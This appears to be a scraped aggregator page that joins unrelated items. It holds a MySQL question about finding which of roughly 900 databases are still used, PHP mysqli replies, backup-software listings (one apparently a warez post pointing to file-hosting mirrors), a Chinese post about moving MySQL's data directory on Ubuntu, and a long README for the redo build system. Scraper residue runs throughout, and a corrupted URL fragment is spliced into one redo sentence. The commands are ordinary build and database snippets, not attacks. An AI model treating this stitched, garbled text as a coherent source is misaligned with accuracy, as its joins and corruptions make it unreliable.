I have “inherited” a collection of Mysql DBs (~900) and I would like to know which of them are actually being used. I looked around and I can find some commands like:

SELECT from_unixtime(UNIX_TIMESTAMP(MAX(UPDATE_TIME))) as last_update FROM information_schema.tables WHERE TABLE_SCHEMA='MY_DB' GROUP BY TABLE_SCHEMA;

but this does not really tell me if MY_DB is being accessed by some web service or users, right? It only informs about when it was last updated, unless I got it wrong. If so, is there a more accurate way to find out the last access of a DB?

Thank you!
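One possible addition to the thread (my suggestion, not from the original post): if performance_schema is enabled, its I/O summary table counts reads and writes per schema since the server last started, which is closer to "is anything touching this database" than UPDATE_TIME:

SELECT OBJECT_SCHEMA,
       SUM(COUNT_READ)  AS reads_since_startup,
       SUM(COUNT_WRITE) AS writes_since_startup
  FROM performance_schema.table_io_waits_summary_by_table
 WHERE OBJECT_SCHEMA = 'MY_DB'
 GROUP BY OBJECT_SCHEMA;

The counters reset on restart, so a database that shows zero reads after the server has been up for a while is a good candidate for archiving.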


          How can I add mysqli result set to another array      Cache   Translate Page      

Thanks. Not sure if it’s still a problem now, as the OP has edited the code to use the results retrieved from the query, but not added any detail on what is actually going wrong.


          How can I add mysqli result set to another array      Cache   Translate Page      

http://php.net/manual/en/mysqli-result.fetch-all.php
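A minimal sketch of what the linked manual page suggests (variable and table names here are hypothetical): fetch the whole result set with fetch_all() and merge it into the other array. Note that fetch_all() requires the mysqlnd driver.

// assumes an open mysqli connection in $mysqli and an existing array $data
$result = $mysqli->query("SELECT id, name FROM items");
$rows   = $result->fetch_all(MYSQLI_ASSOC);  // entire result set as an array of associative rows
$data   = array_merge($data, $rows);         // append the query results to the other array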


          Handy Backup Small Server 7.18.0      Cache   Translate Page      
Detailed overview

Author: Novosoft Handy Backup
File size: 164.30 Mb
Release date: 2018-11-07
Screenshot: Screenshot
Description: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          Ubuntu 上更改 MySQL 数据库数据存储目录      Cache   Translate Page      

I previously wrote a post called "Changing the MySQL database data storage directory"; the test environment at that time was RHEL and CentOS. Unexpectedly, when I recently changed the MySQL data directory on Ubuntu I hit a problem I had not seen before, and the earlier experience did not apply (or rather, the earlier write-up was not comprehensive enough): after changing the MySQL data directory and restarting MySQL, the MySQL service would not start.

"Changing the MySQL data storage directory on Ubuntu" first appeared on 伯乐在线 (Jobbole).
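On Ubuntu the usual cause of this symptom is AppArmor rather than MySQL itself: the default profile only lets mysqld use /var/lib/mysql. A rough sketch of the extra steps (my summary of the commonly documented fix, with /data/mysql as a made-up target path):

# stop MySQL, copy the data, keep ownership
sudo systemctl stop mysql
sudo rsync -av /var/lib/mysql/ /data/mysql/
sudo chown -R mysql:mysql /data/mysql

# point mysqld at the new directory
#   /etc/mysql/mysql.conf.d/mysqld.cnf  ->  datadir = /data/mysql

# tell AppArmor the new path is an alias of the old one
#   /etc/apparmor.d/tunables/alias      ->  alias /var/lib/mysql/ -> /data/mysql/,
sudo systemctl restart apparmor
sudo systemctl start mysql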


          M. Carlessi - La sicurezza dei database MySQL in ottica GDPR      Cache   Translate Page      
none
          M. Carlessi - MySQL 8: un database SQL/NoSQL semplice da usare      Cache   Translate Page      
none
          Problema con un insert de varios registros      Cache   Translate Page      

Problem with an insert of several records

Reply to: Problem with an insert of several records

THANK YOU SO MUCH, I had the same problem; I thought the syntax was the same as in MySQL.

Published on November 4, 2018 by Monica

          App IOS Android receber dados via PUSH      Cache   Translate Page      
I need to build an app that validates the user's login and, if it is within the "validity period", requests data from a URL via push every 30 seconds (or something like that). When there is new data, it should add the information... (Budget: $30 - $250 USD, Jobs: Android, iPhone, Mobile App Development, MySQL)
          Powers Recovery services fund raising      Cache   Translate Page      
www.powers-recovery.com We have put on the ground, with our own finances, a first-class facility to aid in the recovery of less fortunate alcoholics and addicts who lack the resources to afford professional help... (Budget: $250 - $750 USD, Jobs: MySQL, Software Testing, Website Management, Website Testing)
          Iperius Backup Full 5.8.1      Cache   Translate Page      
Iperius Backup Full 5.8.1 - Software information
Title: Iperius Backup Full
Category: System software
Developer: www.iperiusbackup.com
Release year: 2018
File size: 47.00 MB
Uploaded to: TurboBit.net | HitFile.net | Nitroflare.com

About the program: Iperius Backup is a program for backing up, restoring and synchronizing data, compatible with all Windows platforms. It can run automatic backups to many types of storage media: external USB drives, RDX media, NAS, LTO/DAT tape drives, remote computers and FTP sites, and cloud storage. Iperius Backup includes disk imaging, backup of Microsoft SQL Server, MySQL, PostgreSQL and Oracle Database databases, and disaster recovery.
          redo: a top-down software build system (designed by djb)      Cache   Translate Page      
redo: a top-down software build system

redo is a competitor to the long-lived, but sadly imperfect, make program. There are many such competitors, because many people over the years have been dissatisfied with make's limitations. However, of all the replacements I've seen, only redo captures the essential simplicity and flexibility of make, while avoiding its flaws. To my great surprise, it manages to do this while being simultaneously simpler than make, more flexible than make, and more powerful than make.

Although I wrote redo and I would love to take credit for it, the magical simplicity and flexibility comes because I copied verbatim a design by Daniel J. Bernstein (creator of qmail and djbdns, among many other useful things). He posted some very terse notes on his web site at one point (there is no date) with the unassuming title, "Rebuilding target files when source files have changed." Those notes are enough information to understand how the system is supposed to work; unfortunately there's no code to go with it. I get the impression that the hypothetical "djb redo" is incomplete and Bernstein doesn't yet consider it ready for the real world.

I was led to that particular page by random chance from a link on The djb way, by Wayne Marshall.

After I found out about djb redo, I searched the Internet for any sign that other people had discovered what I had: a hidden, unimplemented gem of brilliant code design. I found only one interesting link: Alan Grosskurth, whose Master's thesis at the University of Waterloo was about top-down software rebuilding, that is, djb redo. He wrote his own (admittedly slow) implementation in about 250 lines of shell script.

If you've ever thought about rewriting GNU make from scratch, the idea of doing it in 250 lines of shell script probably didn't occur to you. redo is so simple that it's actually possible. For testing, I actually wrote an even more minimal version, which always rebuilds everything instead of checking dependencies, in 210 lines of shell (about 4 kbytes).

The design is simply that good.

My implementation of redo is called redo for the same reason that there are 75 different versions of make that are all called make. It's somehow easier that way. Hopefully it will turn out to be compatible with the other implementations, should there be any.

My extremely minimal implementation, called do, is in the minimal/ directory of this repository.

(Want to discuss redo? See the bottom of this file for information about our mailing list.)

Install

Install to /usr:

./redo test && sudo ./redo install

Install to $HOME:

./redo test && PREFIX=$HOME ./redo install

License

My version of redo was written without ever seeing redo code by Bernstein or Grosskurth, so I own the entire copyright. It's distributed under the GNU LGPL version 2. You can find a copy of it in the file called LICENSE.

minimal/do is in the public domain so that it's even easier to include inside your own projects for people who don't have a copy of redo.

What's so special about redo?

The theory behind redo is almost magical: it can do everything make can do, only the implementation is vastly simpler, the syntax is cleaner, and you can do even more flexible things without resorting to ugly hacks. Also, you get all the speed of non-recursive make (only check dependencies once per run) combined with all the cleanliness of recursive make (you don't have code from one module stomping on code from another module).

(Disclaimer: my current implementation is not as fast as make for some things, because it's written in python. Eventually I'll rewrite it in C and it'll be very, very fast.)

The easiest way to show it is with an example.

Create a file called default.o.do:

redo-ifchange $2.c
gcc -MD -MF $2.d -c -o $3 $2.c
read DEPS <$2.d
redo-ifchange ${DEPS#*:}

Create a file called myprog.do:

DEPS="a.o b.o"
redo-ifchange $DEPS
gcc -o $3 $DEPS

Of course, you'll also have to create a.c and b.c, the C language source files that you want to build to create your application.

In a.c:

#include <stdio.h>
#include "b.h"

int main() {
    printf(bstr);
}

In b.h:

extern char *bstr;

In b.c:

char *bstr = "hello, world!\n";

Now you simply run:

$ redo myprog

And it says:

redo myprog
redo a.o
redo b.o

Now try this:

$ touch b.h
$ redo myprog

Sure enough, it says:

redo myprog
redo a.o

Did you catch the shell incantation in default.o.do where it generates the autodependencies? The filename default.o.do means "run this script to generate a .o file unless there's a more specific whatever.o.do script that applies."

The key thing to understand about redo is that declaring a dependency is just another shell command. The redo-ifchange command means, "build each of my arguments. If any of them or their dependencies ever change, then I need to run the current script over again."

Dependencies are tracked in a persistent .redo database so that redo can check them later. If a file needs to be rebuilt, it re-executes the whatever.do script and regenerates the dependencies. If a file doesn't need to be rebuilt, redo can calculate that just using its persistent .redo database, without re-running the script. And it can do that check just once right at the start of your project build.

But best of all, as you can see in default.o.do, you can declare a dependency after building the program. In C, you get your best dependency information by trying to actually build, since that's how you find out which headers you need. redo is based on the following simple insight: you don't actually care what the dependencies are before you build the target; if the target doesn't exist, you obviously need to build it. Then, the build script itself can provide the dependency information however it wants; unlike in make, you don't need a special dependency syntax at all. You can even declare some of your dependencies after building, which makes C-style autodependencies much simpler.

(GNU make supports putting some of your dependencies in include files, and auto-reloading those include files if they change. But this is very confusing - the program flow through a Makefile is hard to trace already, and even harder if it restarts randomly from the beginning when a file changes. With redo, you can just read the script from top to bottom. A redo-ifchange call is like calling a function, which you can also read from top to bottom.)

Does it make cross-platform builds easier?

A lot of build systems that try to replace make do it by trying to provide a lot of predefined rules. For example, one build system I know includes default rules that can build C++ programs on Visual C++ or gcc, cross-compiled or not cross-compiled, and so on. Other build systems are specific to ruby programs, or python programs, or Java or .Net programs.

redo isn't like those systems; it's more like make. It doesn't know anything about your system or the language your program is written in.

The good news is: redo will work with any programming language with about equal difficulty. The bad news is: you might have to fill in more details than you would if you just use ANT to compile a Java program.

So the short version is: cross-platform builds are about equally easy in make and redo. It's not any easier, but it's not any harder.

FIXME: Tools like automake are really just collections of Makefile rules so you don't have to write the same ones over and over. In theory, someone could write an automake-like tool for redo, and you could use that.

Hey, does redo even run on windows?

FIXME: Probably under cygwin. But it hasn't been tested, so no.

If I were going to port redo to Windows in a "native" way, I might grab the source code to a posix shell (like the one in MSYS) and link it directly into redo.

make also doesn't really run on Windows (unless you use MSYS or Cygwin or something like that). There are versions of make that do - like Microsoft's version - but their syntax is horrifically different from one vendor to another, so you might as well just be writing for a vendor-specific tool.

At least redo is simple enough that, theoretically, one day, I can imagine it being cross platform.

One interesting project that has appeared recently is busybox-w32 ( https://github.com/pclouds/busybox-w32 ). It's a port of busybox to win32 that includes a mostly POSIX shell (ash) and a bunch of standard Unix utilities. This might be enough to get your redo scripts working on a win32 platform without having to install a bunch of stuff. But all of this needs more experimentation.

One script per file? Can't I just put it all in one big Redofile like make does?

One of my favourite features of redo is that it doesn't add any new syntax; the syntax of redo is exactly the syntax of sh... because sh is the program interpreting your .do file.

Also, it's surprisingly useful to have each build script in its own file; that way, you can declare a dependency on just that one build script instead of the entire Makefile, and you won't have to rebuild everything just because of a one-line Makefile change. (Some build tools avoid that same problem by tracking which variables and commands were used to do the build. But that's more complex, more error prone, and slower.)

See djb's Target files depend on build scripts article for more information.

However, if you really want to, you can simply create a default.do that looks something like this:

case $1 in
  *.o)    ...compile a .o file... ;;
  myprog) ...link a program... ;;
  *)      echo "no rule to build '$1'" >&2; exit 1 ;;
esac

Basically, default.do is the equivalent of a central Makefile in make. As of recent versions of redo, you can use either a single toplevel default.do (which catches requests for files anywhere in the project that don't have their own .do files) or one per directory, or any combination of the above. And you can put some of your targets in default.do and some of them in their own files. Lay it out in whatever way makes sense to you.

One more thing: if you put all your build rules in a single default.do, you'll soon discover that changing anything in that default.do will cause all your targets to be rebuilt - because their .do file has changed. This is technically correct, but you might find it annoying. To work around it, try making your default.do look like this:

. ./default.od

And then put the above case statement in default.od instead. Since you didn't redo-ifchange default.od , changes to default.od won't cause everything to rebuild.

Can I set my dircolors to highlight .do files in ls output?

Yes! At first, having a bunch of .do files in each directory feels like a bit of a nuisance, but once you get used to it, it's actually pretty convenient; a simple 'ls' will show you which things you might want to redo in any given directory.

Here's a chunk of my .dircolors.conf:

.do 00;35
*Makefile 00;35
.o 00;30;1
.pyc 00;30;1
*~ 00;30;1
.tmp 00;30;1

To activate it, you can add a line like this to your .bashrc:

eval `dircolors $HOME/.dircolors.conf`

What are the three parameters ($1, $2, $3) to a .do file?

NOTE: These definitions have changed since the earliest (pre-0.10) versions of redo. The new definitions match what djb's original redo implementation did.

$1 is the name of the target file.

$2 is the basename of the target, minus the extension, if any.

$3 is the name of a temporary file that will be renamed to the target filename atomically if your .do file returns a zero (success) exit code.

In a file called chicken.a.b.c.do that builds a file called chicken.a.b.c , $1 and $2 are chicken.a.b.c , and $3 is a temporary name like chicken.a.b.c.tmp . You might have expected $2 to be just chicken , but that's not possible, because redo doesn't know which portion of the filename is the "extension." Is it .c , .b.c , or .a.b.c ?

.do files starting with default. are special; they can build any target ending with the given extension. So let's say we have a file named default.c.do building a file called chicken.a.b.c . $1 is chicken.a.b.c , $2 is chicken.a.b , and $3 is a temporary name like chicken.a.b.c.tmp .

You should use $1 and $2 only in constructing input filenames and dependencies; never modify the file named by $1 in your script. Only ever write to the file named by $3. That way redo can guarantee proper dependency management and atomicity. (For convenience, you can write to stdout instead of $3 if you want.)

For example, you could compile a .c file into a .o file like this, from a script named default.o.do :

redo-ifchange $2.c
gcc -o $3 -c $2.c

Why not named variables like $FILE, $EXT, $OUT instead of $1, $2, $3?

That sounds tempting and easy, but one downside would be lack of backward compatibility with djb's original redo design.

Longer names aren't necessarily better. Learning the meanings of the three numbers doesn't take long, and over time, those extra few keystrokes can add up. And remember that Makefiles and perl have had strange one-character variable names for a long time. It's not at all clear that removing them is an improvement.

What happens to the stdin/stdout/stderr in a redo file?

As with make, stdin is not redirected. You're probably better off not using it, though, because especially with parallel builds, it might not do anything useful. We might change this behaviour someday since it's such a terrible idea for .do scripts to read from stdin.

As with make, stderr is also not redirected. You can use it to print status messages as your build proceeds. (Eventually, we might want to capture stderr so it's easier to look at the results of parallel builds, but this is tricky to do in a user-friendly way.)

Redo treats stdout specially: it redirects it to point at $3 (see previous question). That is, if your .do file writes to stdout, then the data it writes ends up in the output file. Thus, a really simple chicken.do file that contains only this:

echo hello world

will correctly, and atomically, generate an output file named chicken only if the echo command succeeds.

Isn't it confusing to have stdout go to the target by default?

Yes, it is. It's unlike what almost any other program does, especially make, and it's very easy to make a mistake. For example, if you write in your script:

echo "Hello world"

it will go to the target file rather than to the screen.

A more common mistake is to run a program that writes to stdout by accident as it runs. When you do that, you'll produce your target on $3, but it might be intermingled with junk you wrote to stdout. redo is pretty good about catching this mistake, and it'll print a message like this:

redo  zot.do wrote to stdout *and* created $3.
redo  ...you should write status messages to stderr, not stdout.
redo  zot: exit code 207

Despite the disadvantages, though, automatically capturing stdout does make certain kinds of .do scripts really elegant. The "simplest possible .do file" can be very short. For example, here's one that produces a sub-list from a list:

redo-ifchange filelist
grep ^src/ filelist

redo's simplicity is an attempt to capture the "Zen of Unix," which has a lot to do with concepts like pipelines and stdout. Why should every program have to implement its own -o (output filename) option when the shell already has a redirection operator? Maybe if redo gets more popular, more programs in the world will be able to be even simpler than they are today.

By the way, if you're running some programs that might misbehave and write garbage to stdout instead of stderr (Informational/status messages always belong on stderr, not stdout! Fix your programs!), then just add this line to the top of your .do script:

exec >&2

That will redirect your stdout to stderr, so it works more like you expect.
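
For example, a .do script that compiles a file while printing a status message might look like this (just a sketch; only the exec and echo lines are additions to the earlier examples):

exec >&2                   # from here on, stray stdout goes to stderr
redo-ifchange $2.c
echo "Compiling $2.c"      # status message; lands on stderr, not in the target
gcc -o $3 -c $2.c          # the real output is written explicitly to $3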

Can a *.do file itself be generated as part of the build process?

Not currently. There's nothing fundamentally preventing us from allowing it. However, it seems easier to reason about your build process if you aren't auto-generating your build scripts on the fly.

This might change someday.

Do end users have to have redo installed in order to build my project?

No. We include a very short and simple shell script called do in the minimal/ subdirectory of the redo project. do is like redo (and it works with the same *.do scripts), except it doesn't understand dependencies; it just always rebuilds everything from the top.

You can include do with your program to make it so non-users of redo can still build your program. Someone who wants to hack on your program will probably go crazy unless they have a copy of redo though.

Actually, redo itself isn't so big, so for large projects where it matters, you could just include it with your project.
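
For instance, a project might vendor the script like this (a sketch; the paths and the target name are assumptions, and the exact behaviour of minimal/do may differ between redo versions):

cp /path/to/redo/minimal/do ./do    # copy the one-file build driver into your tree
chmod +x do

# people without redo installed can then build with:
./do myprog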

How does redo store dependencies?

At the toplevel of your project, redo creates a directory named .redo . That directory contains a sqlite3 database with dependency information.

The format of the .redo directory is undocumented because it may change at any time. Maybe it will turn out that we can do something simpler than sqlite3. If you really need to make a tool that pokes around in there, please ask on the mailing list if we can standardize something for you.

Isn't using sqlite3 overkill? And un-djb-ish?

Well, yes. Sort of. I think people underestimate how "lite" sqlite really is:

root root 573376 2010-10-20 09:55 /usr/lib/libsqlite3.so.0.8.6

573k for a complete and very fast and transactional SQL database. For comparison, libdb is:

root root 1256548 2008-09-13 03:23 /usr/lib/libdb-4.6.so

...more than twice as big, and it doesn't even have an SQL parser in it! Or if you want to be really horrified:

root root 1995612 2009-02-03 13:54 /usr/lib/libmysqlclient.so.15.0.0

The mysql client library is two megs, and it doesn't even have a database server in it! People who think SQL databases are automatically bloated and gross have not yet actually experienced the joys of sqlite. SQL has a well-deserved bad reputation, but sqlite is another story entirely. It's excellent, and much simpler and better written than you'd expect.

But still, I'm pretty sure it's not very "djbish" to use a general-purpose database, especially one that has a SQL parser in it. (One of the great things about redo's design is that it doesn't ever need to parse anything, so a SQL parser is a bit embarrassing.)

I'm pretty sure djb never would have done it that way. However, I don't think we can reach the performance we want with dependency/build/lock information stored in plain text files; among other things, that results in too much fstat/open activity, which is slow in general, and even slower if you want to run on Windows. That leads us to a binary database, and if the binary database isn't sqlite or libdb or something, that means we have to implement our own data structures. Which is probably what djb would do, of course, but I'm just not convinced that I can do a better (or even a smaller) job of it than the sqlite guys did.

Most of the state database stuff has been isolated in state.py. If you're feeling brave, you can try to implement your own better state database, with or without sqlite.

It is almost certainly possible to do it much more nicely than I have, so if you do, please send it in!

Is it better to run redo-ifchange once per dependency or just once?

The obvious way to write a list of dependencies might be something like this:

for d in *.c; do
    redo-ifchange ${d%.c}.o
done

But it turns out that's very non-optimal. First of all, it forces all your dependencies to be built in order (redo-ifchange doesn't return until it has finished building), which makes -j parallelism a lot less useful. And secondly, it forks and execs redo-ifchange over and over, which can waste CPU time unnecessarily.

A better way is something like this:

for d in *.c; do
    echo ${d%.c}.o
done | xargs redo-ifchange

That only runs redo-ifchange once (or maybe a few times, if there are really a lot of dependencies and xargs has to split it up), which saves fork/exec time and allows for parallelism.
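
One caveat: xargs splits its input on whitespace, so the loop above assumes your filenames don't contain spaces. If they might, and your xargs supports -0 (GNU and BSD versions do), a safer sketch is:

for d in *.c; do
    printf '%s\0' "${d%.c}.o"
done | xargs -0 redo-ifchange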

If a target didn't change, how do I prevent dependents from being rebuilt?

For example, running ./configure creates a bunch of files including config.h, and config.h might or might not change from one run to the next. We don't want to rebuild everything that depends on config.h if config.h is identical.

With make , which makes build decisions based on timestamps, you would simply have the ./configure script write to config.h.new, then only overwrite config.h with that if the two files are different. However, that's a bit tedious.

With redo , there's an easier way. You can have a config.do script that looks like this:

redo-ifchange autogen.sh *.ac
./autogen.sh
./configure
cat config.h configure Makefile | redo-stamp

Now any of your other .do files can depend on a target called config . config gets rebuilt automatically if any of your autoconf input files are changed (or if someone does redo config to force it). But because of the call to redo-stamp, config is only considered to have changed if the contents of config.h, configure, or Makefile are different than they were before.

(Note that you might actually want to break this .do up into a few phases: for example, one that runs aclocal, one that runs autoconf, and one that runs ./configure. That way your build can always do the minimum amount of work necessary.)

What hash algorithm does redo-stamp use?

It's intentionally undocumented because you shouldn't need to care and it might change at any time. But trust me, it's not the slow part of your build, and you'll never accidentally get a hash collision.

Why not always use checksum-based dependencies instead of timestamps?

Some build systems keep a checksum of target files and rebuild dependents only when the target changes. This is appealing in some cases; for example, with ./configure generating config.h, it could just go ahead and generate config.h; the build system would be smart enough to rebuild or not rebuild dependencies automatically. This keeps build scripts simple and gets rid of the need for people to re-implement file comparison over and over in every project or for multiple files in the same project.

There are disadvantages to using checksums for everything automatically, however:

Building stuff unnecessarily is much less dangerous than not building stuff that should be built. Checksums aren't perfect (think of zero-byte output files); using checksums will cause more builds to be skipped by default, which is very dangerous.

It makes it hard to force things to rebuild when you know you absolutely want that. (With timestamps, you can just touch filename to rebuild everything that depends on filename .)

Targets that are just used for aggregation (ie. they don't produce any output of their own) would always have the same checksum - the checksum of a zero-byte file - which causes confusing results.

Calculating checksums for every output file adds time to the build, even if you don't need that feature.

Building stuff unnecessarily and then stamping it is much slower than just not building it in the first place, so for almost every use of redo-stamp, it's not the right solution anyway.

To steal a line from the Zen of Python: explicit is better than implicit. Making people think about when they're using the stamp feature - knowing that it's slow and a little annoying to do - will help people design better build scripts that depend on this feature as little as possible.

djb's (as yet unreleased) version of redo doesn't implement checksums, so doing that would produce an incompatible implementation. With redo-stamp and redo-always being separate programs, you can simply choose not to use them if you want to keep maximum compatibility for the future.

Bonus: the redo-stamp algorithm is interchangeable. You don't have to stamp the target file or the source files or anything in particular; you can stamp any data you want, including the output of ls or the content of a web page. We could never have made things like that implicit anyway, so some form of explicit redo-stamp would always have been needed, and then we'd have to explain when to use the explicit one and when to use the implicit one.

Thus, we made the decision to only use checksums for targets that explicitly call redo-stamp (see previous question).

I suggest actually trying it out to see how it feels for you. For myself, before there was redo-stamp and redo-always, a few types of problems (in particular, depending on a list of which files exist and which don't) were really annoying, and I definitely felt it. Making redo-stamp and redo-always work the way they do made the pain disappear, so I stopped changing things.
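
As an illustration, "depend on the list of which files exist" can be written by combining the two commands; here's a sketch (the directory name and pattern are placeholders):

# sourcefiles.do -- a sketch
redo-always                       # always re-run this script...
find src -name '*.c' | sort >$3   # ...regenerate the list...
redo-stamp <$3                    # ...but only count it as changed if the list differs

Anything that does redo-ifchange sourcefiles is then rebuilt only when a source file appears or disappears.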

Why does 'redo target' always redo the target, even if it's unchanged?

When you run make target , make first checks the dependencies of target; if they've changed, then it rebuilds target. Otherwise it does nothing.

redo is a little different. It splits the build into two steps. redo target is the second step; if you run that at the command line, it just runs the .do file, whether it needs it or not.

If you really want to only rebuild targets that have changed, you can run redo-ifchange target instead.

The reasons I like this arrangement come down to semantics:

"make target" implies that if target exists, you're done; conversely, "redo target" in English implies you really want to redo it, not just sit around.

If this weren't the rule, redo and redo-ifchange would mean the same thing, which seems rather confusing.

If redo could refuse to run a .do script, you would have no easy one-line way to force a particular target to be rebuilt. You'd have to remove the target and then redo it, which is more typing. On the other hand, nobody actually types "redo foo.o" if they honestly think foo.o doesn't need rebuilding.

For "contentless#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" targets like "test" or "clean", it would be extremely confusing if they refused to run just because they ran successfully last time.

In make, things get complicated because it doesn't differentiate between these two modes. Makefile rules with no dependencies run every time, unless the target exists, in which case they run never, unless the target is marked ".PHONY", in which case they run every time. But targets that do have dependencies follow totally different rules. And all this is needed because there's no way to tell make, "Listen, I just really want you to run the rules for this target right now ."

With redo, the semantics are really simple to explain. If your brain has already been fried by make, you might be surprised by it at first, but once you get used to it, it's really much nicer this way.
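
For example, a contentless clean target is just a .do file whose commands you want to run every time you ask for it; a minimal sketch (the file list is an assumption):

# clean.do -- a sketch
rm -f *.o *.d *.tmp myprog

Running redo clean always executes it, precisely because redo doesn't try to decide whether "clean" is up to date.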

Can my .do files be written in a language other than sh?

Yes. If the first line of your .do file starts with the magic "#!/" sequence (eg. #!/usr/bin/python ), then redo will execute your script using that particular interpreter.

Note that this is slightly different from normal Unix execution semantics. redo never execs your script directly; it only looks for the "#!/" line. The main reason for this is so that your .do scripts don't have to be marked executable (chmod +x). Executable .do scripts would suggest to users that they should run them directly, and they shouldn't; .do scripts should always be executed inside an instance of redo, so that dependencies can be tracked correctly.

WARNING: If your .do script is written in Unix sh, we recommend not including the #!/bin/sh line. That's because there are many variations of /bin/sh, and not all of them are POSIX compliant. redo tries pretty hard to find a good default shell that will be "as POSIXy as possible," and if you override it using #!/bin/sh, you lose this benefit and you'll have to worry more about portability.

Can a single .do script generate multiple outputs?

FIXME: Yes, but this is a bit imperfect.

For example, compiling a .java file produces a bunch of .class files, but exactly which files? It depends on the content of the .java file. Ideally, we would like to allow our .do file to compile the .java file, note which .class files were generated, and tell redo about it for dependency checking.

However, this ends up being confusing; if myprog depends on foo.class, we know that foo.class was generated from bar.java only after bar.java has been compiled. But how do you know, the first time someone asks to build myprog, where foo.class is supposed to come from?

So we haven't thought about this enough yet.

Note that it's okay for a .do file to produce targets other than the advertised one; you just have to be careful. You could have a default.javac.do that runs 'javac $2.java', and then have your program depend on a bunch of .javac files. Just be careful not to depend on the .class files themselves, since redo won't know how to regenerate them.
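
A sketch of that workaround (the javac invocation and project layout are assumptions, not part of redo):

# default.javac.do -- a sketch
redo-ifchange $2.java
javac $2.java
touch $3    # the .javac target is only a stamp; the real outputs are the .class files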

This feature would also be useful, again, with ./configure: typically running the configure script produces several output files, and it would be nice to declare dependencies on all of them.

Recursive make is considered harmful. Isn't redo even more recursive?

You probably mean this 1997 paper by Peter Miller.

Yes, redo is recursive, in the sense that every target is built by its own .do file, and every .do file is a shell script being run recursively from other shell scripts, which might call back into redo . In fact, it's even more recursive than recursive make. There is no non-recursive way to use redo.

However, the reason recursive make is considered harmful is that each instance of make has no access to the dependency information seen by the other instances. Each one starts from its own Makefile, which only has a partial picture of what's going on; moreover, each one has to stat() a lot of the same files over again, leading to slowness. That's the thesis of the "considered harmful" paper.

It turns out that non-recursive make should also be considered harmful . The problem is Makefiles aren't very "hygienic" or "modular"; if you're not running make recursively, then your one copy of make has to know everything about everything in your entire project. Every variable in make is global, so every variable defined in any of your Makefiles is visible in all of your Makefiles. Every little private function or macro is visible everywhere. In a huge project made up of multiple projects from multiple vendors, that's just not okay. Plus, if all your Makefiles are tangled together, make has to read and parse the entire mess even to build the smallest, simplest target file, making it slow.

redo deftly dodges both the problems of recursive make and the problems of non-recursive make. First of all, dependency information is shared through a global persistent .redo database, which is accessed by all your redo instances at once. Dependencies created or checked by one instance can be immediately used by another instance. And there's locking to prevent two instances from building the same target at the same time. So you get all the "global dependency" knowledge of non-recursive make. And it's a binary file, so you can just grab the dependency information you need right now, rather than going through everything linearly.

Also, every .do script is entirely hygienic and traceable; redo discourages the use of global environment variables, suggesting that you put settings into files (which can have timestamps and dependencies) instead. So you also get all the hygiene and modularity advantages of recursive make.

By the way, you can trace any redo build process just by reading the .do scripts from top to bottom. Makefiles are actually a collection of "rules" whose order of execution is unclear; any rule might run at any time. In a non-recursive Makefile setup with a bunch of included files, you end up with lots and lots of rules that can all be executed in a random order; tracing becomes impossible. Recursive make tries to compensate for this by breaking the rules into subsections, but that ends up with all the "considered harmful" paper's complaints. redo runs your scripts from top to bottom in a nice tree, so it's traceable no matter how many layers you have.

How do I set environment variables that affect the entire build?

Directly using environment variables is a bad idea because you can't declare dependencies on them. Also, if there were a file that contained a set of variables that all your .do scripts need to run, then redo would have to read that file every time it starts (which is frequently, since it's recursive), and that could get slow.

Luckily, there's an alternative. Once you get used to it, this method is actually much better than environment variables, because it runs faster and it's easier to debug.

For example, djb often uses a computer-generated script called compile for compiling a .c file into a .o file. To generate the compile script, we create a file called compile.do :

redo-ifchange config.sh
. ./config.sh
echo "gcc -c -o \$3 \$2.c $CFLAGS" >$3
chmod a+x $3

Then, your default.o.do can simply look like this:

redo-ifchange compile $2.c
./compile $1 $2 $3

This is not only elegant, it's useful too. With make, you have to always output everything it does to stdout/stderr so you can try to figure out exactly what it was running; because this gets noisy, some people write Makefiles that deliberately hide the output and print something friendlier, like "Compiling hello.c". But then you have to guess what the compile command looked like.

With redo, the command is ./compile hello.c , which looks good when printed, but is also completely meaningful. Because it doesn't depend on any environment variables, you can just run ./compile hello.c to reproduce its output, or you can look inside the compile file to see exactly what command line is being used.

As a bonus, all the variable expansions only need to be done once: when generating the ./compile program. With make, it would be recalculating expansions every time it compiles a file. Because of the way make does expansions as macros instead of as normal variables, this can be slow.
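
The config.sh file itself can either be checked in by hand or generated by its own .do script. A minimal sketch (the variable names and flags are just placeholders):

# config.sh.do -- a sketch
cat >$3 <<EOF
CC=gcc
CFLAGS="-O2 -Wall -g"
EOF

Anything that sources config.sh should also redo-ifchange config.sh, as compile.do does above, so that changing your flags rebuilds everything that used them.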

How do I write a default.o.do that works for both C and C++ source?

We can upgrade the compile.do from the previous answer to look something like this:

redo-ifchange config.sh
. ./config.sh
cat <<-EOF
[ -e "\$2.cc" ] && EXT=.cc || EXT=.c
gcc -o "\$3" -c "\$2\$EXT" -Wall $CFLAGS
EOF
chmod a+x "$3"

Isn't it expensive to have ./compile doing this kind of test for every single source file? Not really. Remember, if you have two implicit rules in make:

%.o: %.cc
	gcc ...
%.o: %.c
	gcc ...

Then it has to do all the same checks. Except make has even more implicit rules than that, so it ends up trying and discarding lots of possibilities before it actually builds your program. Is there a %.s? A %.cpp? A %.pas? It needs to look for all of them, and it gets slow. The more implicit rules you have, the slower make gets.

In redo, it's not implicit at all; you're specifying exactly how to decide whether it's a C program or a C++ program, and what to do in each case. Plus you can share the two gcc command lines between the two rules, which is hard in make. (In GNU make you can use macro functions, but the syntax for those is ugly.)

Can I just rebuild a part of the project?

Absolutely! Although redo runs "top down" in the sense of one .do file calling into all its dependencies, you can start at any point in the dependency tree that you want.

Unlike recursive make, no matter which subdir of your project you're in when you start, redo will be able to build all the dependencies in the right order.

Unlike non-recursive make, you don't have to jump through any strange hoops (like adding, in each directory, a fake Makefile that does make -C ${TOPDIR} back up to the main non-recursive Makefile). redo just uses filename.do to build filename , or uses default*.do if the specific filename.do doesn't exist.

When running any .do file, redo makes sure its current directory is set to the directory where the .do file is located. That means you can do this:

redo ../utils/foo.o

And it will work exactly like this:

cd ../utils
redo foo.o

In make, if you run

make ../utils/foo.o

it means to look in ./Makefile for a rule called ../utils/foo.o... and it probably doesn't have such a rule. On the other hand, if you run

cd ../utils
make foo.o

it means to look in ../utils/Makefile and look for a rule called foo.o. And that might do something totally different! redo combines these two forms and does the right thing in both cases.

